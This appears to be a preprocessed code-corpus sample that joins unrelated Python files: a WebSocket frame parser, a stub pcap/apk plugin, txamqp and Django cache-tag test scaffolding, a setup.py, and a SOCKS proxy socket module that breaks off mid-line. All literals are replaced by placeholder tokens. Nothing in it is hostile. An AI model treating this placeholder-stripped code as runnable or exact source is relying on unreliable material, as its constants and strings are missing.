<s> import random <EOL> from exception import FrameError <EOL> class Frame ( object ) : <EOL> def __init__ ( self , buf ) : <EOL> self . buf = buf <EOL> self . msg = "<STR_LIT>" <EOL> self . mask = <NUM_LIT:0> <EOL> self . key = "<STR_LIT>" <EOL> self . len = <NUM_LIT:0> <EOL> self . fin = <NUM_LIT:0> <EOL> self . payload = <NUM_LIT:0> <EOL> self . opcode = <NUM_LIT:0> <EOL> self . frame_length = <NUM_LIT:0> <EOL> self . isReady ( ) <EOL> def isReady ( self ) : <EOL> buf = self . buf <EOL> if len ( buf ) < <NUM_LIT:2> : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> self . fin = ord ( buf [ <NUM_LIT:0> ] ) >> <NUM_LIT:7> <EOL> self . opcode = ord ( buf [ <NUM_LIT:0> ] ) & <NUM_LIT> <EOL> self . payload = ord ( buf [ <NUM_LIT:1> ] ) & <NUM_LIT> <EOL> self . mask = ord ( buf [ <NUM_LIT:1> ] ) >> <NUM_LIT:7> <EOL> buf = buf [ <NUM_LIT:2> : ] <EOL> if self . payload < <NUM_LIT> : <EOL> self . len = self . payload <EOL> if self . mask : <EOL> self . frame_length = <NUM_LIT:6> + self . len <EOL> else : <EOL> self . frame_length = <NUM_LIT:2> + self . len <EOL> if self . frame_length > len ( self . buf ) : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> if len ( buf ) < <NUM_LIT:4> and self . mask : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> if self . mask : <EOL> self . key = buf [ : <NUM_LIT:4> ] <EOL> buf = buf [ <NUM_LIT:4> : <NUM_LIT:4> + len ( buf ) + <NUM_LIT:1> ] <EOL> else : <EOL> buf = buf [ : self . len ] <EOL> elif self . payload == <NUM_LIT> : <EOL> if len ( buf ) < <NUM_LIT:6> and self . mask : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> for k , i in [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ] : <EOL> self . len += ( ord ( buf [ k ] ) * <NUM_LIT:1> << ( <NUM_LIT:8> * i ) ) <EOL> if self . mask : <EOL> self . frame_length = <NUM_LIT:8> + self . len <EOL> else : <EOL> self . frame_length = <NUM_LIT:4> + self . len <EOL> if self . frame_length > len ( self . buf ) : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> buf = buf [ <NUM_LIT:2> : ] <EOL> if self . mask : <EOL> self . key = buf [ : <NUM_LIT:4> ] <EOL> buf = buf [ <NUM_LIT:4> : <NUM_LIT:4> + len ( buf ) + <NUM_LIT:1> ] <EOL> else : <EOL> buf = buf [ : self . len ] <EOL> else : <EOL> if len ( buf ) < <NUM_LIT:10> and self . mask : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> for k , i in [ ( <NUM_LIT:0> , <NUM_LIT:7> ) , ( <NUM_LIT:1> , <NUM_LIT:6> ) , ( <NUM_LIT:2> , <NUM_LIT:5> ) , ( <NUM_LIT:3> , <NUM_LIT:4> ) , ( <NUM_LIT:4> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:2> ) , ( <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:7> , <NUM_LIT:0> ) ] : <EOL> self . len += ( ord ( buf [ k ] ) * <NUM_LIT:1> << ( <NUM_LIT:8> * i ) ) <EOL> if self . mask : <EOL> self . frame_length = <NUM_LIT> + self . len <EOL> else : <EOL> self . frame_length = <NUM_LIT:10> + self . len <EOL> if self . frame_length > len ( self . buf ) : <EOL> raise FrameError ( "<STR_LIT>" ) <EOL> buf = buf [ <NUM_LIT:8> : ] <EOL> if self . mask : <EOL> self . key = buf [ : <NUM_LIT:4> ] <EOL> buf = buf [ <NUM_LIT:4> : <NUM_LIT:4> + len ( buf ) + <NUM_LIT:1> ] <EOL> else : <EOL> buf = buf [ self . len ] <EOL> self . msg = buf <EOL> def message ( self ) : <EOL> if not self . mask : <EOL> return self . msg <EOL> decoded_msg = "<STR_LIT>" <EOL> for i in xrange ( self . len ) : <EOL> c = ord ( self . msg [ i ] ) ^ ord ( self . key [ i % <NUM_LIT:4> ] ) <EOL> decoded_msg += str ( chr ( c ) ) <EOL> return decoded_msg <EOL> def length ( self ) : <EOL> return self . frame_length <EOL> @ staticmethod <EOL> def encodeMessage ( buf , key ) : <EOL> encoded_msg = "<STR_LIT>" <EOL> buf_len = len ( buf ) <EOL> for i in xrange ( buf_len ) : <EOL> c = ord ( buf [ i ] ) ^ ord ( key [ i % <NUM_LIT:4> ] ) <EOL> encoded_msg += str ( chr ( c ) ) <EOL> return encoded_msg <EOL> @ staticmethod <EOL> def buildMessage ( buf , mask = True ) : <EOL> c_buf = buf <EOL> msg = "<STR_LIT>" <EOL> if mask : <EOL> key = "<STR_LIT>" . join ( [ str ( chr ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:255> ) ) ) for i in xrange ( <NUM_LIT:4> ) ] ) <EOL> o = ( <NUM_LIT:1> << <NUM_LIT:7> ) + <NUM_LIT:1> <EOL> msg += str ( chr ( o ) ) <EOL> buf_len = len ( buf ) <EOL> if buf_len < <NUM_LIT> : <EOL> o = buf_len <EOL> if mask : <EOL> msg += str ( chr ( o + ( <NUM_LIT:1> << <NUM_LIT:7> ) ) ) <EOL> else : <EOL> msg += str ( chr ( o ) ) <EOL> if mask : <EOL> msg += key <EOL> msg += Frame . encodeMessage ( buf , key ) <EOL> else : <EOL> msg += buf <EOL> return msg <EOL> if buf_len <= ( ( <NUM_LIT:1> << <NUM_LIT:16> ) - <NUM_LIT:1> ) : <EOL> if mask : <EOL> msg += str ( chr ( <NUM_LIT> + ( <NUM_LIT:1> << <NUM_LIT:7> ) ) ) <EOL> else : <EOL> msg += str ( chr ( <NUM_LIT> ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:3> ) : <EOL> o = ( buf_len >> ( <NUM_LIT:16> - ( <NUM_LIT:8> * i ) ) ) & ( <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:1> ) <EOL> msg += str ( chr ( o ) ) <EOL> if mask : <EOL> msg += key <EOL> msg += Frame . encodeMessage ( buf , key ) <EOL> else : <EOL> msg += buf <EOL> return msg <EOL> if buf_len <= ( ( <NUM_LIT:1> << <NUM_LIT:64> ) - <NUM_LIT:1> ) : <EOL> if mask : <EOL> msg += str ( chr ( <NUM_LIT> + ( <NUM_LIT:1> << <NUM_LIT:7> ) ) ) <EOL> else : <EOL> msg += str ( chr ( <NUM_LIT> ) ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:9> ) : <EOL> o = ( buf_len >> ( <NUM_LIT:64> - ( <NUM_LIT:8> * i ) ) ) & ( <NUM_LIT:2> ** <NUM_LIT:8> - <NUM_LIT:1> ) <EOL> msg += str ( chr ( o ) ) <EOL> if mask : <EOL> msg += key <EOL> msg += Frame . encodeMessage ( buf , key ) <EOL> else : <EOL> msg += buf <EOL> return msg </s>
<s> pluginName = "<STR_LIT>" <EOL> enable = False <EOL> type = "<STR_LIT:test>" <EOL> class PluginClass : <EOL> def run ( self , pcap , apk ) : <EOL> dummyrule = '<STR_LIT>' <EOL> dummycomment = "<STR_LIT>" <EOL> ruleList = list ( ) <EOL> commentList = list ( ) <EOL> ruleList . append ( dummyrule ) <EOL> commentList . append ( dummycomment ) <EOL> return ( pluginName , ruleList , commentList ) </s>
<s> import sys <EOL> from . program import run <EOL> sys . exit ( run ( ) ) </s>
<s> '''<STR_LIT>''' </s>
<s> from __future__ import print_function <EOL> from datetime import datetime <EOL> import six <EOL> from six . moves . urllib . parse import quote <EOL> from email . utils import parsedate <EOL> def parse_datetime ( string ) : <EOL> return datetime ( * ( parsedate ( string ) [ : <NUM_LIT:6> ] ) ) <EOL> def parse_html_value ( html ) : <EOL> return html [ html . find ( '<STR_LIT:>>' ) + <NUM_LIT:1> : html . rfind ( '<STR_LIT:<>' ) ] <EOL> def parse_a_href ( atag ) : <EOL> start = atag . find ( '<STR_LIT:">' ) + <NUM_LIT:1> <EOL> end = atag . find ( '<STR_LIT:">' , start ) <EOL> return atag [ start : end ] <EOL> def convert_to_utf8_str ( arg ) : <EOL> if isinstance ( arg , six . text_type ) : <EOL> arg = arg . encode ( '<STR_LIT:utf-8>' ) <EOL> elif not isinstance ( arg , bytes ) : <EOL> arg = six . text_type ( arg ) . encode ( '<STR_LIT:utf-8>' ) <EOL> return arg <EOL> def import_simplejson ( ) : <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> try : <EOL> import json <EOL> except ImportError : <EOL> try : <EOL> from django . utils import simplejson as json <EOL> except ImportError : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> return json <EOL> def list_to_csv ( item_list ) : <EOL> if item_list : <EOL> return '<STR_LIT:U+002C>' . join ( [ str ( i ) for i in item_list ] ) </s>
<s> import os <EOL> import warnings <EOL> from txamqp . content import Content <EOL> import txamqp . spec <EOL> from txamqp . protocol import AMQClient <EOL> from txamqp . client import TwistedDelegate <EOL> from twisted . internet import error , protocol , reactor <EOL> from twisted . trial import unittest <EOL> from twisted . internet . defer import inlineCallbacks , Deferred , returnValue <EOL> from txamqp . queue import Empty <EOL> RABBITMQ = "<STR_LIT>" <EOL> OPENAMQ = "<STR_LIT>" <EOL> QPID = "<STR_LIT>" <EOL> class supportedBrokers ( object ) : <EOL> def __init__ ( self , * supporterBrokers ) : <EOL> self . supporterBrokers = supporterBrokers <EOL> def __call__ ( self , f ) : <EOL> if _get_broker ( ) not in self . supporterBrokers : <EOL> f . skip = "<STR_LIT>" <EOL> return f <EOL> def _get_broker ( ) : <EOL> return os . environ . get ( "<STR_LIT>" ) <EOL> USERNAME = '<STR_LIT>' <EOL> PASSWORD = '<STR_LIT>' <EOL> VHOST = '<STR_LIT:/>' <EOL> HEARTBEAT = <NUM_LIT:0> <EOL> class TestBase ( unittest . TestCase ) : <EOL> clientClass = AMQClient <EOL> heartbeat = HEARTBEAT <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> unittest . TestCase . __init__ ( self , * args , ** kwargs ) <EOL> self . host = '<STR_LIT:localhost>' <EOL> self . port = <NUM_LIT> <EOL> self . broker = _get_broker ( ) <EOL> if self . broker is None : <EOL> warnings . warn ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . broker = RABBITMQ <EOL> if self . broker == RABBITMQ : <EOL> self . spec = '<STR_LIT>' <EOL> elif self . broker == OPENAMQ : <EOL> self . spec = '<STR_LIT>' <EOL> elif self . broker == QPID : <EOL> self . spec = '<STR_LIT>' <EOL> else : <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % self . broker ) <EOL> self . user = USERNAME <EOL> self . password = PASSWORD <EOL> self . vhost = VHOST <EOL> self . queues = [ ] <EOL> self . exchanges = [ ] <EOL> self . connectors = [ ] <EOL> @ inlineCallbacks <EOL> def connect ( self , host = None , port = None , spec = None , user = None , password = None , vhost = None , <EOL> heartbeat = None , clientClass = None ) : <EOL> host = host or self . host <EOL> port = port or self . port <EOL> spec = spec or self . spec <EOL> user = user or self . user <EOL> password = password or self . password <EOL> vhost = vhost or self . vhost <EOL> heartbeat = heartbeat or self . heartbeat <EOL> clientClass = clientClass or self . clientClass <EOL> delegate = TwistedDelegate ( ) <EOL> onConn = Deferred ( ) <EOL> p = clientClass ( delegate , vhost , txamqp . spec . load ( spec ) , heartbeat = heartbeat ) <EOL> f = protocol . _InstanceFactory ( reactor , p , onConn ) <EOL> c = reactor . connectTCP ( host , port , f ) <EOL> def errb ( thefailure ) : <EOL> thefailure . trap ( error . ConnectionRefusedError ) <EOL> print "<STR_LIT>" "<STR_LIT>" % ( host , port , self . broker , thefailure , ) <EOL> thefailure . raiseException ( ) <EOL> onConn . addErrback ( errb ) <EOL> self . connectors . append ( c ) <EOL> client = yield onConn <EOL> yield client . authenticate ( user , password ) <EOL> returnValue ( client ) <EOL> @ inlineCallbacks <EOL> def setUp ( self ) : <EOL> try : <EOL> self . client = yield self . connect ( ) <EOL> except txamqp . client . Closed , le : <EOL> le . args = tuple ( ( "<STR_LIT>" "<STR_LIT>" "<STR_LIT>" % ( _get_broker ( ) , <EOL> USERNAME , PASSWORD , VHOST ) , ) + le . args ) <EOL> raise <EOL> self . channel = yield self . client . channel ( <NUM_LIT:1> ) <EOL> yield self . channel . channel_open ( ) <EOL> @ inlineCallbacks <EOL> def tearDown ( self ) : <EOL> for ch , q in self . queues : <EOL> yield ch . queue_delete ( queue = q ) <EOL> for ch , ex in self . exchanges : <EOL> yield ch . exchange_delete ( exchange = ex ) <EOL> for connector in self . connectors : <EOL> yield connector . disconnect ( ) <EOL> @ inlineCallbacks <EOL> def queue_declare ( self , channel = None , * args , ** keys ) : <EOL> channel = channel or self . channel <EOL> reply = yield channel . queue_declare ( * args , ** keys ) <EOL> self . queues . append ( ( channel , reply . queue ) ) <EOL> returnValue ( reply ) <EOL> @ inlineCallbacks <EOL> def exchange_declare ( self , channel = None , ticket = <NUM_LIT:0> , exchange = '<STR_LIT>' , <EOL> type = '<STR_LIT>' , passive = False , durable = False , <EOL> auto_delete = False , internal = False , nowait = False , <EOL> arguments = { } ) : <EOL> channel = channel or self . channel <EOL> reply = yield channel . exchange_declare ( ticket , exchange , type , passive , durable , auto_delete , internal , nowait , arguments ) <EOL> self . exchanges . append ( ( channel , exchange ) ) <EOL> returnValue ( reply ) <EOL> def assertChannelException ( self , expectedCode , message ) : <EOL> self . assertEqual ( "<STR_LIT>" , message . method . klass . name ) <EOL> self . assertEqual ( "<STR_LIT>" , message . method . name ) <EOL> self . assertEqual ( expectedCode , message . reply_code ) <EOL> def assertConnectionException ( self , expectedCode , message ) : <EOL> self . assertEqual ( "<STR_LIT>" , message . method . klass . name ) <EOL> self . assertEqual ( "<STR_LIT>" , message . method . name ) <EOL> self . assertEqual ( expectedCode , message . reply_code ) <EOL> @ inlineCallbacks <EOL> def consume ( self , queueName ) : <EOL> """<STR_LIT>""" <EOL> reply = yield self . channel . basic_consume ( queue = queueName , no_ack = True ) <EOL> returnValue ( ( yield self . client . queue ( reply . consumer_tag ) ) ) <EOL> @ inlineCallbacks <EOL> def assertEmpty ( self , queue ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> yield queue . get ( timeout = <NUM_LIT:1> ) <EOL> self . fail ( "<STR_LIT>" ) <EOL> except Empty : None <EOL> @ inlineCallbacks <EOL> def assertPublishGet ( self , queue , exchange = "<STR_LIT>" , routing_key = "<STR_LIT>" , properties = None ) : <EOL> """<STR_LIT>""" <EOL> body = self . uniqueString ( ) <EOL> self . channel . basic_publish ( exchange = exchange , <EOL> content = Content ( body , properties = properties ) , <EOL> routing_key = routing_key ) <EOL> msg = yield queue . get ( timeout = <NUM_LIT:1> ) <EOL> self . assertEqual ( body , msg . content . body ) <EOL> if ( properties ) : self . assertEqual ( properties , msg . content . properties ) <EOL> def uniqueString ( self ) : <EOL> """<STR_LIT>""" <EOL> if not "<STR_LIT>" in dir ( self ) : self . uniqueCounter = <NUM_LIT:1> ; <EOL> return "<STR_LIT>" + str ( self . uniqueCounter ) <EOL> @ inlineCallbacks <EOL> def assertPublishConsume ( self , queue = "<STR_LIT>" , exchange = "<STR_LIT>" , routing_key = "<STR_LIT>" , properties = None ) : <EOL> """<STR_LIT>""" <EOL> yield self . assertPublishGet ( ( yield self . consume ( queue ) ) , exchange , routing_key , properties ) </s>
<s> from django import template <EOL> from adv_cache_tag . tag import CacheTag , Node <EOL> register = template . Library ( ) <EOL> class TestNode ( Node ) : <EOL> def __init__ ( self , nodename , nodelist , expire_time , multiplicator , fragment_name , vary_on ) : <EOL> """<STR_LIT>""" <EOL> super ( TestNode , self ) . __init__ ( nodename , nodelist , expire_time , fragment_name , vary_on ) <EOL> self . multiplicator = multiplicator <EOL> class TestCacheTag ( CacheTag ) : <EOL> class Meta ( CacheTag . Meta ) : <EOL> compress_spaces = True <EOL> Node = TestNode <EOL> @ classmethod <EOL> def get_template_node_arguments ( cls , tokens ) : <EOL> """<STR_LIT>""" <EOL> if len ( tokens ) < <NUM_LIT:4> : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" % tokens [ <NUM_LIT:0> ] ) <EOL> return tokens [ <NUM_LIT:1> ] , tokens [ <NUM_LIT:2> ] , tokens [ <NUM_LIT:3> ] , tokens [ <NUM_LIT:4> : ] <EOL> def prepare_params ( self ) : <EOL> """<STR_LIT>""" <EOL> self . multiplicator = int ( template . Variable ( self . node . multiplicator ) . resolve ( self . context ) ) <EOL> super ( TestCacheTag , self ) . prepare_params ( ) <EOL> def get_expire_time ( self ) : <EOL> """<STR_LIT>""" <EOL> expiry_time = super ( TestCacheTag , self ) . get_expire_time ( ) <EOL> return self . multiplicator * expiry_time <EOL> TestCacheTag . register ( register , '<STR_LIT>' , '<STR_LIT>' ) <EOL> class FailingCacheSetCacheTag ( CacheTag ) : <EOL> def cache_set ( self , to_cache ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> FailingCacheSetCacheTag . register ( register , '<STR_LIT>' ) <EOL> class FailingCacheGetCacheTag ( CacheTag ) : <EOL> def cache_get ( self ) : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> FailingCacheGetCacheTag . register ( register , '<STR_LIT>' ) </s>
<s> import ast <EOL> import codecs <EOL> import os <EOL> from pip . req import parse_requirements <EOL> from setuptools import setup , find_packages <EOL> package_name = '<STR_LIT>' <EOL> long_doc_file = '<STR_LIT>' <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> try : <EOL> from pip . download import PipSession <EOL> except ImportError : <EOL> parse_args = { } <EOL> else : <EOL> parse_args = { '<STR_LIT>' : PipSession ( ) } <EOL> def get_requirements ( source ) : <EOL> install_reqs = parse_requirements ( source , ** parse_args ) <EOL> return set ( [ str ( ir . req ) for ir in install_reqs ] ) <EOL> class VersionFinder ( ast . NodeVisitor ) : <EOL> def __init__ ( self ) : <EOL> self . data = { } <EOL> def visit_Assign ( self , node ) : <EOL> if node . targets [ <NUM_LIT:0> ] . id in ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) : <EOL> self . data [ node . targets [ <NUM_LIT:0> ] . id [ <NUM_LIT:2> : - <NUM_LIT:2> ] ] = node . value . s <EOL> def read ( * path_parts ) : <EOL> filename = os . path . join ( os . path . dirname ( __file__ ) , * path_parts ) <EOL> with codecs . open ( filename , encoding = '<STR_LIT:utf-8>' ) as fp : <EOL> return fp . read ( ) <EOL> def find_info ( * path_parts ) : <EOL> finder = VersionFinder ( ) <EOL> node = ast . parse ( read ( * path_parts ) ) <EOL> finder . visit ( node ) <EOL> info = finder . data <EOL> info [ '<STR_LIT>' ] = ast . get_docstring ( node ) <EOL> return info <EOL> package_info = find_info ( package_name , '<STR_LIT>' ) <EOL> setup ( <EOL> name = package_name , <EOL> version = package_info [ '<STR_LIT:version>' ] , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> description = package_info [ '<STR_LIT>' ] , <EOL> long_description = read ( long_doc_file ) , <EOL> url = package_info [ '<STR_LIT>' ] , <EOL> author = package_info [ '<STR_LIT>' ] , <EOL> author_email = package_info [ '<STR_LIT>' ] , <EOL> install_requires = get_requirements ( '<STR_LIT>' ) , <EOL> license = package_info [ '<STR_LIT>' ] , <EOL> classifiers = classifiers , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> import socket <EOL> import struct <EOL> import sys <EOL> if getattr ( socket , '<STR_LIT>' , None ) is None : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> PROXY_TYPE_SOCKS4 = <NUM_LIT:1> <EOL> PROXY_TYPE_SOCKS5 = <NUM_LIT:2> <EOL> PROXY_TYPE_HTTP = <NUM_LIT:3> <EOL> _defaultproxy = None <EOL> _orgsocket = socket . socket <EOL> class ProxyError ( Exception ) : pass <EOL> class GeneralProxyError ( ProxyError ) : pass <EOL> class Socks5AuthError ( ProxyError ) : pass <EOL> class Socks5Error ( ProxyError ) : pass <EOL> class Socks4Error ( ProxyError ) : pass <EOL> class HTTPError ( ProxyError ) : pass <EOL> _generalerrors = ( "<STR_LIT:success>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> _socks5errors = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> _socks5autherrors = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> _socks4errors = ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> def setdefaultproxy ( proxytype = None , addr = None , port = None , rdns = True , username = None , password = None ) : <EOL> """<STR_LIT>""" <EOL> global _defaultproxy <EOL> _defaultproxy = ( proxytype , addr , port , rdns , username , password ) <EOL> def wrapmodule ( module ) : <EOL> """<STR_LIT>""" <EOL> if _defaultproxy != None : <EOL> module . socket . socket = socksocket <EOL> else : <EOL> raise GeneralProxyError ( ( <NUM_LIT:4> , "<STR_LIT>" ) ) <EOL> class socksocket ( socket . socket ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , family = socket . AF_INET , type = socket . SOCK_STREAM , proto = <NUM_LIT:0> , _sock = None ) : <EOL> _orgsocket . __init__ ( self , family , type , proto , _sock ) <EOL> if _defaultproxy != None : <EOL> self . __proxy = _defaultproxy <EOL> else : <EOL> self . __proxy = ( None , None , None , None , None , None ) <EOL> self . __proxysockname = None <EOL> self . __proxypeername = None <EOL> def __recvall ( self , count ) : <EOL> """<STR_LIT>""" <EOL> data = self . recv ( count ) <EOL> while len ( data ) < count : <EOL> d = self . recv ( count - len ( data ) ) <EOL> if not d : raise GeneralProxyError ( ( <NUM_LIT:0> , "<STR_LIT>" ) ) <EOL> data = data + d <EOL> return data <EOL> def setproxy ( self , proxytype = None , addr = None , port = None , rdns = True , username = None , password = None ) : <EOL> """<STR_LIT>""" <EOL> self . __proxy = ( proxytype , addr , port , rdns , username , password ) <EOL> def __negotiatesocks5 ( self , destaddr , destport ) : <EOL> """<STR_LIT>""" <EOL> if ( self . __proxy [ <NUM_LIT:4> ] != None ) and ( self . __proxy [ <NUM_LIT:5> ] != None ) : <EOL> self . sendall ( struct . pack ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> else : <EOL> self . sendall ( struct . pack ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> chosenauth = self . __recvall ( <NUM_LIT:2> ) <EOL> if chosenauth [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if chosenauth [ <NUM_LIT:1> : <NUM_LIT:2> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> pass <EOL> elif chosenauth [ <NUM_LIT:1> : <NUM_LIT:2> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . sendall ( chr ( <NUM_LIT> ) . encode ( ) + chr ( len ( self . __proxy [ <NUM_LIT:4> ] ) ) + self . __proxy [ <NUM_LIT:4> ] + chr ( len ( self . __proxy [ <NUM_LIT:5> ] ) ) + self . __proxy [ <NUM_LIT:5> ] ) <EOL> authstat = self . __recvall ( <NUM_LIT:2> ) <EOL> if authstat [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if authstat [ <NUM_LIT:1> : <NUM_LIT:2> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise Socks5AuthError ( ( <NUM_LIT:3> , _socks5autherrors [ <NUM_LIT:3> ] ) ) <EOL> else : <EOL> self . close ( ) <EOL> if chosenauth [ <NUM_LIT:1> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> raise Socks5AuthError ( ( <NUM_LIT:2> , _socks5autherrors [ <NUM_LIT:2> ] ) ) <EOL> else : <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> req = struct . pack ( '<STR_LIT>' , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> try : <EOL> ipaddr = socket . inet_aton ( destaddr ) <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) + ipaddr <EOL> except socket . error : <EOL> if self . __proxy [ <NUM_LIT:3> ] : <EOL> ipaddr = None <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) + chr ( len ( destaddr ) ) . encode ( ) + destaddr <EOL> else : <EOL> ipaddr = socket . inet_aton ( socket . gethostbyname ( destaddr ) ) <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) + ipaddr <EOL> req = req + struct . pack ( "<STR_LIT>" , destport ) <EOL> self . sendall ( req ) <EOL> resp = self . __recvall ( <NUM_LIT:4> ) <EOL> if resp [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> elif resp [ <NUM_LIT:1> : <NUM_LIT:2> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> if ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) <= <NUM_LIT:8> : <EOL> raise Socks5Error ( ( ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) , _socks5errors [ ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) ] ) ) <EOL> else : <EOL> raise Socks5Error ( ( <NUM_LIT:9> , _socks5errors [ <NUM_LIT:9> ] ) ) <EOL> elif resp [ <NUM_LIT:3> : <NUM_LIT:4> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> boundaddr = self . __recvall ( <NUM_LIT:4> ) <EOL> elif resp [ <NUM_LIT:3> : <NUM_LIT:4> ] == chr ( <NUM_LIT> ) . encode ( ) : <EOL> resp = resp + self . recv ( <NUM_LIT:1> ) <EOL> boundaddr = self . __recvall ( ord ( resp [ <NUM_LIT:4> : <NUM_LIT:5> ] ) ) <EOL> else : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> boundport = struct . unpack ( "<STR_LIT>" , self . __recvall ( <NUM_LIT:2> ) ) [ <NUM_LIT:0> ] <EOL> self . __proxysockname = ( boundaddr , boundport ) <EOL> if ipaddr != None : <EOL> self . __proxypeername = ( socket . inet_ntoa ( ipaddr ) , destport ) <EOL> else : <EOL> self . __proxypeername = ( destaddr , destport ) <EOL> def getproxysockname ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __proxysockname <EOL> def getproxypeername ( self ) : <EOL> """<STR_LIT>""" <EOL> return _orgsocket . getpeername ( self ) <EOL> def getpeername ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __proxypeername <EOL> def __negotiatesocks4 ( self , destaddr , destport ) : <EOL> """<STR_LIT>""" <EOL> rmtrslv = False <EOL> try : <EOL> ipaddr = socket . inet_aton ( destaddr ) <EOL> except socket . error : <EOL> if self . __proxy [ <NUM_LIT:3> ] : <EOL> ipaddr = struct . pack ( "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> rmtrslv = True <EOL> else : <EOL> ipaddr = socket . inet_aton ( socket . gethostbyname ( destaddr ) ) <EOL> req = struct . pack ( "<STR_LIT>" , <NUM_LIT> , <NUM_LIT> , destport ) + ipaddr <EOL> if self . __proxy [ <NUM_LIT:4> ] != None : <EOL> req = req + self . __proxy [ <NUM_LIT:4> ] <EOL> req = req + chr ( <NUM_LIT> ) . encode ( ) <EOL> if rmtrslv : <EOL> req = req + destaddr + chr ( <NUM_LIT> ) . encode ( ) <EOL> self . sendall ( req ) <EOL> resp = self . __recvall ( <NUM_LIT:8> ) <EOL> if resp [ <NUM_LIT:0> : <NUM_LIT:1> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> raise GeneralProxyError ( ( <NUM_LIT:1> , _generalerrors [ <NUM_LIT:1> ] ) ) <EOL> if resp [ <NUM_LIT:1> : <NUM_LIT:2> ] != chr ( <NUM_LIT> ) . encode ( ) : <EOL> self . close ( ) <EOL> if ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) in ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) : <EOL> self . close ( ) <EOL> raise Socks4Error ( ( ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> ] ) , _socks4errors [ ord ( resp [ <NUM_LIT:1> : <NUM_LIT:2> 